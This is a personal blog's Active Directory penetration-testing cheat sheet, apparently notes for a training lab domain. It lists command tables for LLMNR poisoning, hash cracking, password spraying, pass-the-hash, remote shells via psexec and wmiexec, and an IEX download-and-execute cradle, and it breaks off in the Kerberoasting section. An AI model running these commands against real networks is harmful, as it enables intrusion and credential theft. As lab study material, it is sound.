<!DOCTYPE html><html class="appearance-auto" lang="en"><head><meta charset="UTF-8"><title>AD_Cheat_Sheet</title><meta name="description" content="Buona notte"><meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, initial-scale=1"><!-- Google Analytics --><!-- End Google Analytics -->
<!-- Baidu Analytics --><!-- End Baidu Analytics --><link rel="icon" href="/images/favicon.ico"><link rel="stylesheet" href="/style/common/bulma.css"><link rel="stylesheet" href="/style/base.css"><link rel="stylesheet" href="/style/common/helper.css"><script src="/js/common.js"></script><link rel="stylesheet" href="/style/post.css"><link rel="stylesheet" href="/style/themes/highlight-theme-light.css"><link rel="stylesheet" href="/style/common/jquery.fancybox.min.css"><script src="/js/highlight.pack.js"></script><meta name="description" content="Initial Enumeration


Command
Description



nslookup ns1.inlanefreight.com
Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host.


sudo tcpdump -i ens224
Used to start capturing network packets on the network interface proceeding the -i option a Linux-based host.


sudo respo.."><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Salve" type="application/atom+xml">
</head><body class="is-flex is-flex-direction-column"><header class="header-widget is-flex-shrink-0 is-hidden-mobile"><div class="container is-fullhd is-flex is-justify-content-space-between is-align-items-center is-full-height"><section class="is-hidden-mobile is-flex-shrink-0"><h2><a href="/">Taninluv's blog</a></h2></section><h3 class="is-hidden-mobile is-family-serif is-full-height is-flex is-align-items-center is-flex-shrink-0"><div class="is-full-height" id="postTopic"><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">AD_Cheat_Sheet</p><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">Click back to the top</p></div></h3><aside class="is-flex-shrink-0"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></aside></div></header><header class="is-flex header-widget is-flex-shrink-0 is-align-items-center is-justify-content-center is-hidden-tablet"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></header><main><main class="container is-max-widescreen content section post-page pt-4 px-4"><div class="columns is-flex-desktop is-justify-content-center is-flex-direction-row-reverse"><div class="column is-3 is-hidden-mobile"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Initial-Enumeration"><span class="toc-text">Initial Enumeration</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#LLMNR-x2F-NTB-NS-Poisoning"><span class="toc-text">LLMNR&#x2F;NTB-NS Poisoning</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Password-Spraying-amp-Password-Policies"><span class="toc-text">Password Spraying &amp; Password Policies</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Enumerating-Security-Controls"><span class="toc-text">Enumerating Security Controls</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Credentialed-Enumeration"><span class="toc-text">Credentialed Enumeration</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Enumeration-by-Living-Off-the-Land"><span class="toc-text">Enumeration by Living Off the Land</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Transfering-Files"><span class="toc-text">Transfering Files</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Kerberoasting"><span class="toc-text">Kerberoasting</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ACL-Enumeration-amp-Tactics"><span class="toc-text">ACL Enumeration &amp; Tactics</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#DCSync"><span class="toc-text">DCSync</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Privileged-Access"><span class="toc-text">Privileged Access</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NoPac"><span class="toc-text">NoPac</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#PrintNightmare"><span class="toc-text">PrintNightmare</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#PetitPotam"><span class="toc-text">PetitPotam</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Miscellaneous-Misconfigurations"><span class="toc-text">Miscellaneous Misconfigurations</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Group-Policy-Enumeration-amp-Attacks"><span class="toc-text">Group Policy Enumeration &amp; Attacks</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ASREPRoasting"><span class="toc-text">ASREPRoasting</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Trust-Relationships-Child-gt-Parent-Trusts"><span class="toc-text">Trust Relationships - Child &gt; Parent Trusts</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Trust-Relationships-Cross-Forest"><span class="toc-text">Trust Relationships - Cross-Forest</span></a></li></ol></div><div class="column is-9"><header class="my-4"><a href="/tags/cheat_sheet"><i class="tag post-item-tag">cheat_sheet</i></a><a href="/tags/AD"><i class="tag post-item-tag">AD</i></a></header><h1 class="mt-0 mb-1 is-family-serif" id="postTitle">AD_Cheat_Sheet</h1><time class="has-text-grey" datetime="2023-09-23T04:19:05.000Z">2023-09-23</time><article class="mt-2 post-content"><h1 id="Initial-Enumeration"><a href="#Initial-Enumeration" class="headerlink" title="Initial Enumeration"></a>Initial Enumeration</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>nslookup ns1.inlanefreight.com</code></td>
<td>Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo tcpdump -i ens224</code></td>
<td>Used to start capturing network packets on the network interface proceeding the <code>-i</code> option a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo responder -I ens224 -A</code></td>
<td>Used to start responding to &amp; analyzing <code>LLMNR</code>, <code>NBT-NS</code> and <code>MDNS</code> queries on the interface specified proceeding the<code> -I</code> option and operating in <code>Passive Analysis</code> mode which is activated using <code>-A</code>. Performed from a Linux-based host</td>
</tr>
<tr>
<td><code>fping -asgq 172.16.5.0/23</code></td>
<td>Performs a ping sweep on the specified network segment from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum</code></td>
<td>Performs an nmap scan that with OS detection, version detection, script scanning, and traceroute enabled (<code>-A</code>) based on a list of hosts (<code>hosts.txt</code>) specified in the file proceeding <code>-iL</code>. Then outputs the scan results to the file specified after the <code>-oN</code>option. Performed from a Linux-based host</td>
</tr>
<tr>
<td><code>sudo git clone https://github.com/ropnop/kerbrute.git</code></td>
<td>Uses <code>git</code> to clone the kerbrute tool from a Linux-based host.</td>
</tr>
<tr>
<td><code>make help</code></td>
<td>Used to list compiling options that are possible with <code>make</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo make all</code></td>
<td>Used to compile a <code>Kerbrute</code> binary for multiple OS platforms and CPU architectures.</td>
</tr>
<tr>
<td><code>./kerbrute_linux_amd64</code></td>
<td>Used to test the chosen complied <code>Kebrute</code> binary from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute</code></td>
<td>Used to move the <code>Kerbrute</code> binary to a directory can be set to be in a Linux user’s path. Making it easier to use the tool.</td>
</tr>
<tr>
<td><code>./kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o kerb-results</code></td>
<td>Runs the Kerbrute tool to discover usernames in the domain (<code>INLANEFREIGHT.LOCAL</code>) specified proceeding the <code>-d</code> option and the associated domain controller specified proceeding <code>--dc</code>using a wordlist and outputs (<code>-o</code>) the results to a specified file. Performed from a Linux-based host.</td>
</tr>
</tbody></table>
<h1 id="LLMNR-x2F-NTB-NS-Poisoning"><a href="#LLMNR-x2F-NTB-NS-Poisoning" class="headerlink" title="LLMNR&#x2F;NTB-NS Poisoning"></a>LLMNR&#x2F;NTB-NS Poisoning</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>responder -h</code></td>
<td>Used to display the usage instructions and various options available in <code>Responder</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt</code></td>
<td>Uses <code>hashcat</code> to crack <code>NTLMv2</code> (<code>-m</code>) hashes that were captured by responder and saved in a file (<code>frond_ntlmv2</code>). The cracking is done based on a specified wordlist.</td>
</tr>
<tr>
<td><code>Import-Module .\Inveigh.ps1</code></td>
<td>Using the <code>Import-Module</code> PowerShell cmd-let to import the Windows-based tool <code>Inveigh.ps1</code>.</td>
</tr>
<tr>
<td><code>(Get-Command Invoke-Inveigh).Parameters</code></td>
<td>Used to output many of the options &amp; functionality available with <code>Invoke-Inveigh</code>. Peformed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y</code></td>
<td>Starts <code>Inveigh</code> on a Windows-based host with LLMNR &amp; NBNS spoofing enabled and outputs the results to a file.</td>
</tr>
<tr>
<td><code>.\Inveigh.exe</code></td>
<td>Starts the <code>C#</code> implementation of <code>Inveigh</code> from a Windows-based host.</td>
</tr>
<tr>
<td><code>$regkey = &quot;HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces&quot; Get-ChildItem $regkey |foreach &#123; Set-ItemProperty -Path &quot;$regkey\$($_.pschildname)&quot; -Name NetbiosOptions -Value 2 -Verbose&#125;</code></td>
<td>PowerShell script used to disable NBT-NS on a Windows host.</td>
</tr>
</tbody></table>
<h1 id="Password-Spraying-amp-Password-Policies"><a href="#Password-Spraying-amp-Password-Policies" class="headerlink" title="Password Spraying &amp; Password Policies"></a>Password Spraying &amp; Password Policies</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>#!/bin/bash  for x in &#123;&#123;A..Z&#125;,&#123;0..9&#125;&#125;&#123;&#123;A..Z&#125;,&#123;0..9&#125;&#125;&#123;&#123;A..Z&#125;,&#123;0..9&#125;&#125;&#123;&#123;A..Z&#125;,&#123;0..9&#125;&#125;     do echo $x; done</code></td>
<td>Bash script used to generate <code>16,079,616</code> possible username combinations from a Linux-based host.</td>
</tr>
<tr>
<td><code>crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol</code></td>
<td>Uses <code>CrackMapExec</code>and valid credentials (<code>avazquez:Password123</code>) to enumerate the password policy (<code>--pass-pol</code>) from a Linux-based host.</td>
</tr>
<tr>
<td><code>rpcclient -U &quot;&quot; -N 172.16.5.5</code></td>
<td>Uses <code>rpcclient</code> to discover information about the domain through <code>SMB NULL</code> sessions. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>rpcclient $&gt; querydominfo</code></td>
<td>Uses <code>rpcclient</code> to enumerate the password policy in a target Windows domain from a Linux-based host.</td>
</tr>
<tr>
<td><code>enum4linux  -P 172.16.5.5</code></td>
<td>Uses <code>enum4linux</code> to enumerate the password policy (<code>-P</code>) in a target Windows domain from a Linux-based host.</td>
</tr>
<tr>
<td><code>enum4linux-ng -P 172.16.5.5 -oA ilfreight</code></td>
<td>Uses <code>enum4linux-ng</code> to enumerate the password policy (<code>-P</code>) in a target Windows domain from a Linux-based host, then presents the output in YAML &amp; JSON saved in a file proceeding the <code>-oA</code> option.</td>
</tr>
<tr>
<td><code>ldapsearch -h 172.16.5.5 -x -b &quot;DC=INLANEFREIGHT,DC=LOCAL&quot; -s sub &quot;*&quot; | grep -m 1 -B 10 pwdHistoryLength</code></td>
<td>Uses <code>ldapsearch</code> to enumerate the password policy in a  target Windows domain from a Linux-based host.</td>
</tr>
<tr>
<td><code>net accounts</code></td>
<td>Used to enumerate the password policy in a Windows domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>Import-Module .\PowerView.ps1</code></td>
<td>Uses the Import-Module cmd-let to import the <code>PowerView.ps1</code> tool from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainPolicy</code></td>
<td>Used to enumerate the password policy in a target Windows domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>enum4linux -U 172.16.5.5  | grep &quot;user:&quot; | cut -f2 -d&quot;[&quot; | cut -f1 -d&quot;]&quot;</code></td>
<td>Uses <code>enum4linux</code> to discover user accounts in a target Windows domain, then leverages <code>grep</code> to filter the output to just display the user from a Linux-based host.</td>
</tr>
<tr>
<td><code>rpcclient -U &quot;&quot; -N 172.16.5.5  rpcclient $&gt; enumdomuser</code></td>
<td>Uses rpcclient to discover user accounts in a target Windows domain from a Linux-based host.</td>
</tr>
<tr>
<td><code>crackmapexec smb 172.16.5.5 --users</code></td>
<td>Uses <code>CrackMapExec</code> to discover users (<code>--users</code>) in a target Windows domain from a Linux-based host.</td>
</tr>
<tr>
<td><code>ldapsearch -h 172.16.5.5 -x -b &quot;DC=INLANEFREIGHT,DC=LOCAL&quot; -s sub &quot;(&amp;(objectclass=user))&quot;  | grep sAMAccountName: | cut -f2 -d&quot; &quot;</code></td>
<td>Uses <code>ldapsearch</code> to discover users in a target Windows doman, then filters the output using <code>grep</code> to show only the <code>sAMAccountName</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>./windapsearch.py --dc-ip 172.16.5.5 -u &quot;&quot; -U</code></td>
<td>Uses the python tool <code>windapsearch.py</code> to discover users in a target Windows domain from a Linux-based host.</td>
</tr>
<tr>
<td><code>for u in $(cat valid_users.txt);do rpcclient -U &quot;$u%Welcome1&quot; -c &quot;getusername;quit&quot; 172.16.5.5 | grep Authority; done</code></td>
<td>Bash one-liner used to perform a password spraying attack using <code>rpcclient</code> and a list of users (<code>valid_users.txt</code>) from a Linux-based host. It also filters out failed attempts to make the output cleaner.</td>
</tr>
<tr>
<td><code>kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1</code></td>
<td>Uses <code>kerbrute</code> and a list of users (<code>valid_users.txt</code>) to perform a password spraying attack against a target Windows domain from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +</code></td>
<td>Uses <code>CrackMapExec</code> and a list of users (<code>valid_users.txt</code>) to perform a password spraying attack against a target Windows domain from a Linux-based host. It also filters out logon failures using <code>grep</code>.</td>
</tr>
<tr>
<td><code> sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123</code></td>
<td>Uses <code>CrackMapExec</code> to validate a set of credentials from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +</code></td>
<td>Uses <code>CrackMapExec</code> and the -<code>-local-auth</code> flag to ensure only one login attempt is performed from a Linux-based host. This is to ensure accounts are not locked out by enforced password policies. It also filters out logon failures using <code>grep</code>.</td>
</tr>
<tr>
<td><code>Import-Module .\DomainPasswordSpray.ps1</code></td>
<td>Used to import the PowerShell-based tool <code>DomainPasswordSpray.ps1</code> from a Windows-based host.</td>
</tr>
<tr>
<td><code>Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue</code></td>
<td>Performs a password spraying attack and outputs (-OutFile) the results to a specified file (<code>spray_success</code>) from a Windows-based host.</td>
</tr>
</tbody></table>
<h1 id="Enumerating-Security-Controls"><a href="#Enumerating-Security-Controls" class="headerlink" title="Enumerating Security Controls"></a>Enumerating Security Controls</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>Get-MpComputerStatus</code></td>
<td>PowerShell cmd-let used to check the status of <code>Windows Defender Anti-Virus</code> from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections</code></td>
<td>PowerShell cmd-let used to view <code>AppLocker</code> policies from a Windows-based host.</td>
</tr>
<tr>
<td><code>$ExecutionContext.SessionState.LanguageMode</code></td>
<td>PowerShell script used to discover the <code>PowerShell Language Mode</code> being used on a Windows-based host. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Find-LAPSDelegatedGroups</code></td>
<td>A <code>LAPSToolkit</code> function that discovers <code>LAPS Delegated Groups</code> from a Windows-based host.</td>
</tr>
<tr>
<td><code>Find-AdmPwdExtendedRights</code></td>
<td>A <code>LAPSTookit</code> function that checks the rights on each computer with LAPS enabled for any groups with read access and users with <code>All Extended Rights</code>. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-LAPSComputers</code></td>
<td>A <code>LAPSToolkit</code> function that searches for computers that have LAPS enabled, discover password expiration and can discover randomized passwords. Performed from a Windows-based host.</td>
</tr>
</tbody></table>
<h1 id="Credentialed-Enumeration"><a href="#Credentialed-Enumeration" class="headerlink" title="Credentialed Enumeration"></a>Credentialed Enumeration</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>xfreerdp /u:forend@inlanefreight.local /p:Klmcargo2 /v:172.16.5.25</code></td>
<td>Connects to a Windows target using valid credentials. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users</code></td>
<td>Authenticates with a Windows target over <code>smb</code> using valid credentials and attempts to discover more users (<code>--users</code>) in a target Windows domain. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups</code></td>
<td>Authenticates with a Windows target over <code>smb</code> using valid credentials and attempts to discover groups (<code>--groups</code>) in a target Windows domain. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 --loggedon-users</code></td>
<td>Authenticates with a Windows target over <code>smb</code> using valid credentials and attempts to check for a list of logged on users (<code>--loggedon-users</code>) on the target Windows host. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares</code></td>
<td>Authenticates with a Windows target over <code>smb</code> using valid credentials and attempts to discover any smb shares (<code>--shares</code>). Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share Dev-share</code></td>
<td>Authenticates with a Windows target over <code>smb</code> using valid credentials and utilizes the CrackMapExec module (<code>-M</code>) <code>spider_plus</code> to go through each readable share (<code>Dev-share</code>) and list all readable files.  The results are outputted in <code>JSON</code>. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5</code></td>
<td>Enumerates the target Windows domain using valid credentials and lists shares &amp; permissions available on each within the context of the valid credentials used and the target Windows host (<code>-H</code>). Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SYSVOL --dir-only</code></td>
<td>Enumerates the target Windows domain using valid credentials and performs a recursive listing (<code>-R</code>) of the specified share (<code>SYSVOL</code>) and only outputs a list of directories (<code>--dir-only</code>) in the share. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code> rpcclient $&gt; queryuser 0x457</code></td>
<td>Enumerates a target user account in a Windows domain using its relative identifier (<code>0x457</code>). Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>rpcclient $&gt; enumdomusers</code></td>
<td>Discovers user accounts in a target Windows domain and their associated relative identifiers (<code>rid</code>). Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>psexec.py inlanefreight.local/wley:&#39;transporter@4&#39;@172.16.5.125  </code></td>
<td>Impacket tool used to connect to the <code>CLI</code>  of a Windows target via the <code>ADMIN$</code> administrative share with valid credentials. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>wmiexec.py inlanefreight.local/wley:&#39;transporter@4&#39;@172.16.5.5  </code></td>
<td>Impacket tool used to connect to the <code>CLI</code> of a Windows target via <code>WMI</code> with valid credentials. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>windapsearch.py -h</code></td>
<td>Used to display the options and functionality of windapsearch.py. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p Klmcargo2 --da</code></td>
<td>Used to enumerate the domain admins group (<code>--da</code>) using a valid set of credentials on a target Windows domain. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p Klmcargo2 -PU</code></td>
<td>Used to perform a recursive search (<code>-PU</code>) for users with nested permissions using valid credentials. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo bloodhound-python -u &#39;forend&#39; -p &#39;Klmcargo2&#39; -ns 172.16.5.5 -d inlanefreight.local -c all</code></td>
<td>Executes the python implementation of BloodHound (<code>bloodhound.py</code>) with valid credentials and specifies a name server (<code>-ns</code>) and target Windows domain (<code>inlanefreight.local</code>)  as well as runs all checks (<code>-c all</code>). Runs using valid credentials. Performed from a Linux-based host.</td>
</tr>
</tbody></table>
<h1 id="Enumeration-by-Living-Off-the-Land"><a href="#Enumeration-by-Living-Off-the-Land" class="headerlink" title="Enumeration by Living Off the Land"></a>Enumeration by Living Off the Land</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>Get-Module</code></td>
<td>PowerShell cmd-let used to list all available modules, their version and command options from a Windows-based host.</td>
</tr>
<tr>
<td><code>Import-Module ActiveDirectory</code></td>
<td>Loads the <code>Active Directory</code> PowerShell module from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ADDomain</code></td>
<td>PowerShell cmd-let used to gather Windows domain information from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ADUser -Filter &#123;ServicePrincipalName -ne &quot;$null&quot;&#125; -Properties ServicePrincipalName</code></td>
<td>PowerShell cmd-let used to enumerate user accounts on a target Windows domain and filter by <code>ServicePrincipalName</code>. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ADTrust -Filter *</code></td>
<td>PowerShell cmd-let used to enumerate any trust relationships in a target Windows domain and filters by any (<code>-Filter *</code>). Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ADGroup -Filter * | select name</code></td>
<td>PowerShell cmd-let used to enumerate groups in a target Windows domain and filters by the name of the group (<code>select name</code>). Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ADGroup -Identity &quot;Backup Operators&quot;</code></td>
<td>PowerShell cmd-let used to search for a specifc group (<code>-Identity &quot;Backup Operators&quot;</code>). Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ADGroupMember -Identity &quot;Backup Operators&quot;</code></td>
<td>PowerShell cmd-let used to discover the members of a specific group (<code>-Identity &quot;Backup Operators&quot;</code>). Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Export-PowerViewCSV</code></td>
<td>PowerView script used to append results to a <code>CSV</code> file. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>ConvertTo-SID</code></td>
<td>PowerView script used to convert a <code>User</code> or <code>Group</code> name to it’s <code>SID</code>. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainSPNTicket</code></td>
<td>PowerView script used to request the kerberos ticket for a specified service principal name (<code>SPN</code>). Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-Domain</code></td>
<td>PowerView script used tol return the AD object for the current (or specified) domain. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainController</code></td>
<td>PowerView script used to return a list of the target domain controllers for the specified target domain. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainUser</code></td>
<td>PowerView script used to return all users or specific user objects in AD. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainComputer</code></td>
<td>PowerView script used to return all computers or specific computer objects in AD. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainGroup</code></td>
<td>PowerView script used to eturn all groups or specific group objects in AD. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainOU</code></td>
<td>PowerView script used to search for all or specific OU objects in AD. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Find-InterestingDomainAcl</code></td>
<td>PowerView script used to find object <code>ACLs</code> in the domain with modification rights set to non-built in objects. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainGroupMember</code></td>
<td>PowerView script used to return the members of a specific domain group. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainFileServer</code></td>
<td>PowerView script used to return a list of servers likely functioning as file servers. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainDFSShare</code></td>
<td>PowerView script used to return a list of all distributed file systems for the current (or specified) domain. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainGPO</code></td>
<td>PowerView script used to return all GPOs or specific GPO objects in AD. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainPolicy</code></td>
<td>PowerView script used to return the default domain policy or the domain controller policy for the current domain. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-NetLocalGroup</code></td>
<td>PowerView script used to  enumerate local groups on a local or remote machine. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-NetLocalGroupMember</code></td>
<td>PowerView script enumerate members of a specific local group. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-NetShare</code></td>
<td>PowerView script used to return a list of open shares on a local (or a remote) machine. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-NetSession</code></td>
<td>PowerView script used to return session information for the local (or a remote) machine. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Test-AdminAccess</code></td>
<td>PowerView script used to test if the current user has administrative access to the local (or a remote) machine. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Find-DomainUserLocation</code></td>
<td>PowerView script used to find machines where specific users are logged into. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Find-DomainShare</code></td>
<td>PowerView script used to find reachable shares on domain machines. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Find-InterestingDomainShareFile</code></td>
<td>PowerView script that searches for files matching specific criteria on readable shares in the domain. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Find-LocalAdminAccess</code></td>
<td>PowerView script used to find machines on the local domain where the current user has local administrator access Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainTrust</code></td>
<td>PowerView script that returns domain trusts for the current domain or a specified domain. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ForestTrust</code></td>
<td>PowerView script that returns all forest trusts for the current forest or a specified forest. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainForeignUser</code></td>
<td>PowerView script that enumerates users who are in groups outside of the user’s domain. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainForeignGroupMember</code></td>
<td>PowerView script that enumerates groups with users outside of the group’s domain and returns each foreign member. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainTrustMapping</code></td>
<td>PowerView script that enumerates all trusts for current domain and any others seen. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainGroupMember -Identity &quot;Domain Admins&quot; -Recurse</code></td>
<td>PowerView script used to list all the members of a target group (<code>&quot;Domain Admins&quot;</code>) through the use of the recurse option (<code>-Recurse</code>). Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName</code></td>
<td>PowerView script used to find users on the target Windows domain that have the <code>Service Principal Name</code> set. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>.\Snaffler.exe  -d INLANEFREIGHT.LOCAL -s -v data</code></td>
<td>Runs a tool called <code>Snaffler</code> against a target Windows domain that finds various kinds of data in shares that the compromised account has access to. Performed from a Windows-based host.</td>
</tr>
</tbody></table>
<h1 id="Transfering-Files"><a href="#Transfering-Files" class="headerlink" title="Transfering Files"></a>Transfering Files</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>sudo python3 -m http.server 8001</code></td>
<td>Starts a python web server for quick hosting of files. Performed from a Linux-basd host.</td>
</tr>
<tr>
<td><code>&quot;IEX(New-Object Net.WebClient).downloadString(&#39;http://172.16.5.222/SharpHound.exe&#39;)&quot;</code></td>
<td>PowerShell one-liner used to download a file from a web server. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>impacket-smbserver -ip 172.16.5.x -smb2support -username user -password password shared /home/administrator/Downloads/</code></td>
<td>Starts a impacket <code>SMB</code> server for quick hosting of a file. Performed from a Windows-based host.</td>
</tr>
</tbody></table>
<h1 id="Kerberoasting"><a href="#Kerberoasting" class="headerlink" title="Kerberoasting"></a>Kerberoasting</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>sudo python3 -m pip install .</code></td>
<td>Used to install Impacket from inside the directory that gets cloned to the attack host. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>GetUserSPNs.py -h</code></td>
<td>Impacket tool used to display the options and functionality of <code>GetUserSPNs.py</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday</code></td>
<td>Impacket tool used to get a list of <code>SPNs</code> on the target Windows domain from  a Linux-based host.</td>
</tr>
<tr>
<td><code>GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request</code></td>
